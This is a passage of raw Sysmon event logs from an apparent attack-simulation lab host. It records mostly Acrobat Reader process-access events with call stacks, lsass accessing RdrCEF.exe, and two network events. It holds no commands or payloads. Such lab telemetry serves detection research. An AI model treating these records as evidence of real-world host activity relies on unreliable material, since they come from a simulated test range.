DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.841{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.840{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.839{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.838{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.837{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.837{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.836{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.836{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.834{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.833{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.818{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.818{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000046926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.463{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56473-false72.21.91.29-80http 354300x800000000000000046925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.452{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50795- 10341000x800000000000000046924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.815{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.814{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.813{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.813{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 